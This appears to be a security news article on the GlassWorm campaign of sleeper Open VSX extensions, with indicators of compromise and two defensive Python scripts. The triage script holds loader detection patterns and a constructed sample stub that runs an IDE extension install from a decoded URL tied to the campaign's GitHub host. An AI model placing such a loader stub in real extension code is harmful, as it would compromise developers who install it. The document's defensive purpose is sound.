Hackers News
CyberSecurity News
GlassWorm Campaign Uses 73 Malicious Open VSX Extensions

Marcus Rodriguez
April 26, 2026

Key Takeaways

  • The GlassWorm supply chain attack has intensified with the discovery of 73 new “sleeper” extensions on the Open VSX marketplace.
  • Attackers now publish initially benign extensions and weaponize them later through updates, so a scan at submission time sees nothing malicious.
  • These malicious extensions mimic popular tools, leveraging fake publisher names and cloned aesthetics to trick developers into installation.
  • The campaign employs both native binaries and heavily obfuscated JavaScript to deliver malicious payloads, often fetching additional .vsix files for IDEs like VS Code and Cursor.

GlassWorm Campaign Escalates with 73 New Malicious Open VSX Extensions

The GlassWorm supply chain attack targeting the Open VSX marketplace has significantly expanded, with researchers uncovering an additional 73 “sleeper” extensions designed to compromise software developers. This latest wave, identified in April 2026, signals a concerning evolution in how threat actors are deploying malware within the developer ecosystem.

This discovery follows a substantial wave of 72 malicious Open VSX extensions linked to the GlassWorm operation, which were documented in March 2026. While earlier iterations of the campaign exploited extension dependency features to silently install malicious loaders, the April 2026 cluster reveals more advanced tactics aimed at evading security scans.

The “Sleeper” Extension Strategy

A “sleeper” extension refers to a deceptive package published by threat actors that initially appears harmless. These extensions are designed to build trust and credibility, accumulating downloads before they are weaponized. Attackers typically create new GitHub accounts to publish these cloned versions of legitimate, popular development tools.

For instance, one example involved attackers creating a fake Turkish Language Pack for Visual Studio Code. This malicious extension meticulously mimicked the legitimate version, copying the globe icon and description, with the only discernible difference being a swapped publisher name. This tactic aims to deceive developers who might not scrutinize publisher details closely.

Once developers install these seemingly benign tools, the attackers bide their time before pushing a software update that delivers the malicious payload. At least six of the 73 newly discovered extensions have already been activated to deploy their intended malware.

Evolving Delivery Mechanisms

The latest iteration of the GlassWorm campaign demonstrates a refined approach to payload delivery. The extension itself now functions primarily as a thin loader that fetches external payloads rather than carrying the malicious code in its own source. Because the published package contains little more than the fetch logic, a static scan of the marketplace listing has far less to detect.

The campaign employs two primary execution methods:

  • Native Binaries: The extension bundles a native Node.js addon (a .node file) inside its code. A small JavaScript stub loads and executes this binary, which carries embedded URLs used to download additional malicious .vsix files. These payloads are installed into Integrated Development Environments (IDEs) such as VS Code and Cursor.
  • Obfuscated JavaScript: Here the malicious logic is heavily obfuscated and does not rely on a bundled binary. The code decodes itself at runtime, then retrieves a malicious .vsix payload from a GitHub release and installs it by way of the IDE's command-line interface.

Indicators of Compromise

Security teams should actively monitor for the following indicators associated with the GlassWorm campaign:

  • Native Installer Binaries (SHA256): 1b62b7c2ed7cc296ce821f977ef7b22bae59ef1dcdb9a34ae19467ee39bcf168
  • Downloaded VSIX Payload (SHA256): 97c275e3406ad6576529f41604ad138c5bdc4297d195bf61b049e14f6b30adfd
  • Malicious GitHub Hosting: github[.]com/SquadMagistrate10/wnxtgkih
  • Confirmed Malicious Extensions: outsidestormcommand, monochromator-theme, boulderzitunnel, vscode-buddies
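The two loader patterns described above and the indicators in this list can be turned into a quick triage pass over the extension folders an IDE keeps on disk. The script below is an added example written for this page, not tooling from the Socket Research Team or from the GlassWorm reporting: it hashes every file against the listed SHA256 values, looks for the listed GitHub hosting path and extension names, and applies assumed heuristics for a thin loader (a bundled .node addon loaded from JavaScript, long hex-escaped strings, eval or new Function, references to .vsix or --install-extension). The sample extension tree it scans is constructed in a temporary directory and contains no real malware.

```python
"""Triage unpacked VS Code / Cursor extensions for GlassWorm-style loader traits.
Added example, not Socket's tooling. Heuristic patterns are assumptions drawn from
the article's description; IoC values are the ones the article lists."""
import hashlib
import json
import os
import re
import tempfile

# Indicators of compromise listed in the article.
IOC_SHA256 = {
    "1b62b7c2ed7cc296ce821f977ef7b22bae59ef1dcdb9a34ae19467ee39bcf168",  # native installer
    "97c275e3406ad6576529f41604ad138c5bdc4297d195bf61b049e14f6b30adfd",  # downloaded VSIX
}
IOC_EXTENSION_NAMES = {"outsidestormcommand", "monochromator-theme", "boulderzitunnel", "vscode-buddies"}
IOC_GITHUB_PATH = "github.com/SquadMagistrate10/wnxtgkih"

# Assumed heuristics: runtime decoding, a bundled native addon, and fetching or
# installing a .vsix through the IDE's command line.
LOADER_PATTERNS = {
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "hex_escaped_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "native_binary_load": re.compile(r"require\(\s*['\"][^'\"]*\.node['\"]\s*\)"),
    "vsix_reference": re.compile(r"\.vsix\b", re.IGNORECASE),
    "cli_install": re.compile(r"--install-extension"),
    "github_release_download": re.compile(r"github\.com/[^\s'\"]+/releases/download/"),
}

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_extension(ext_dir):
    """Return {'id', 'findings'} for one unpacked extension directory."""
    findings = []
    ext_id = os.path.basename(ext_dir)
    manifest = os.path.join(ext_dir, "package.json")
    if os.path.isfile(manifest):
        with open(manifest, encoding="utf-8") as f:
            pkg = json.load(f)
        ext_id = f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}"
        if pkg.get("name") in IOC_EXTENSION_NAMES:
            findings.append(("ioc_extension_name", pkg["name"]))
    for root, _dirs, files in os.walk(ext_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, ext_dir)
            if sha256_of(path) in IOC_SHA256:
                findings.append(("ioc_sha256", rel))
            if name.endswith(".node"):
                findings.append(("bundled_native_binary", rel))
            with open(path, "rb") as f:
                text = f.read().decode("utf-8", errors="ignore")
            # The hosting path may sit inside a binary as an embedded URL, so every file is checked.
            if IOC_GITHUB_PATH in text:
                findings.append(("ioc_github_path", rel))
            if name.endswith((".js", ".cjs", ".mjs")):
                for label, pattern in LOADER_PATTERNS.items():
                    if pattern.search(text):
                        findings.append((label, rel))
    return {"id": ext_id, "findings": findings}

def scan_all(extensions_root):
    """Scan every extension folder under e.g. ~/.vscode/extensions or ~/.cursor/extensions."""
    return [scan_extension(os.path.join(extensions_root, d))
            for d in sorted(os.listdir(extensions_root))
            if os.path.isdir(os.path.join(extensions_root, d))]

def build_sample_tree(root):
    """Constructed sample: a benign theme and a sleeper-style clone with a swapped publisher."""
    benign = os.path.join(root, "acme.nice-theme-1.0.0")
    os.makedirs(os.path.join(benign, "themes"))
    with open(os.path.join(benign, "package.json"), "w") as f:
        json.dump({"publisher": "acme", "name": "nice-theme", "version": "1.0.0"}, f)
    with open(os.path.join(benign, "themes", "nice.json"), "w") as f:
        json.dump({"colors": {"editor.background": "#101010"}}, f)
    # Clone: a JS stub loads a bundled .node, decodes a hex string, runs the IDE CLI.
    sleeper = os.path.join(root, "acm3.nice-theme-1.0.1")
    os.makedirs(os.path.join(sleeper, "out"))
    with open(os.path.join(sleeper, "package.json"), "w") as f:
        json.dump({"publisher": "acm3", "name": "nice-theme", "version": "1.0.1",
                   "main": "./out/extension.js"}, f)
    with open(os.path.join(sleeper, "out", "extension.js"), "w") as f:
        f.write('const b = require("./helper.node");\n'
                'const u = "\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x65\\x78";\n'
                'require("child_process").execSync(`code --install-extension ${b.fetch(u)}`);\n')
    with open(os.path.join(sleeper, "out", "helper.node"), "wb") as f:
        f.write(b"\x7fELF" + b"\x00" * 12 +
                b"https://github.com/SquadMagistrate10/wnxtgkih/releases/download/v1/p.vsix\x00")

def demo():
    """Build the constructed tree in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="glassworm-triage-")
    build_sample_tree(root)
    return scan_all(root)

if __name__ == "__main__":
    for report in demo():
        print(report["id"], sorted({label for label, _ in report["findings"]}) or "clean")
```

Point scan_all at ~/.vscode/extensions or ~/.cursor/extensions to run it on a real machine. The heuristics will also flag legitimate extensions that ship native addons or minified bundles, so treat a heuristic hit as a prioritisation aid; a hash or hosting-path match is a confirmed indicator.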

What You Should Do

According to the Socket Research Team, developers must exercise extreme caution when installing extensions from the Open VSX marketplace. Practical mitigation steps include:

  • Verify Publisher Namespaces: Always meticulously check the publisher name of any extension, ensuring it matches the official or expected publisher.
  • Inspect Download Counts and Reviews: While not foolproof, higher download counts and consistent positive reviews can be indicators of legitimacy, though attackers are trying to subvert this.
  • Scrutinize Extension Permissions: Understand the permissions an extension requests and question any that seem excessive for its stated functionality.
  • Use Security Tools: Employ security solutions that scan for malicious code in development environments and monitor for suspicious network activity.
  • Stay Updated: Keep development tools and IDEs updated to their latest versions to benefit from security patches.
  • Isolate Development Environments: Consider using virtualized or containerized development environments to limit the potential impact of a compromise.
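The publisher-namespace check in the first step can be enforced rather than left to eyeballing. The following is an added example, not guidance code from Socket or from the article: it compares the ids reported by `code --list-extensions` (the sample output below is constructed) against an assumed team allowlist of publisher.name ids and flags any installed extension whose name matches an approved one but whose publisher differs, which is the swapped-publisher pattern described for the fake Turkish Language Pack.

```python
"""Enforce an extension allowlist and flag same-name, different-publisher lookalikes.
Added example, not from the article or Socket. The allowlist and the
`code --list-extensions` output below are constructed for illustration."""

# Assumed team allowlist of approved "publisher.name" ids (lowercase; ids are case-insensitive).
ALLOWLIST = {
    "ms-ceintl.vscode-language-pack-tr",
    "esbenp.prettier-vscode",
    "dbaeumer.vscode-eslint",
}

# Constructed sample of `code --list-extensions` output: one lookalike of the
# language pack with a swapped publisher, and one extension nobody approved.
SAMPLE_LIST_OUTPUT = """\
MS-CEINTL.vscode-language-pack-tr
esbenp.prettier-vscode
ms-ce1ntl.vscode-language-pack-tr
someone.vscode-buddies
"""

def parse_list_output(text):
    """Normalise one id per line to lowercase, dropping blank lines."""
    return [line.strip().lower() for line in text.splitlines() if line.strip()]

def check_installed(installed, allowlist=ALLOWLIST):
    """Map each id to 'allowed', 'publisher_swap:<expected>', 'unapproved' or 'malformed'."""
    approved_publishers = {}
    for ext_id in allowlist:
        publisher, name = ext_id.split(".", 1)
        approved_publishers.setdefault(name, set()).add(publisher)
    verdicts = {}
    for ext_id in installed:
        if ext_id in allowlist:
            verdicts[ext_id] = "allowed"
        elif "." not in ext_id:
            verdicts[ext_id] = "malformed"
        else:
            publisher, name = ext_id.split(".", 1)
            if name in approved_publishers:
                # Same extension name, unexpected publisher: the cloned-listing tactic.
                expected = ",".join(sorted(approved_publishers[name]))
                verdicts[ext_id] = f"publisher_swap:{expected}"
            else:
                verdicts[ext_id] = "unapproved"
    return verdicts

if __name__ == "__main__":
    for ext_id, verdict in check_installed(parse_list_output(SAMPLE_LIST_OUTPUT)).items():
        print(f"{verdict:32} {ext_id}")
```

Feed it the output of `code --list-extensions` (or the equivalent for Cursor). A publisher_swap verdict is exactly the language-pack case from the article; an unapproved verdict is a candidate for closer inspection before it is allowed to update.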

Tags: Attack, Malware, Security, Threat

Marcus Rodriguez
Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.
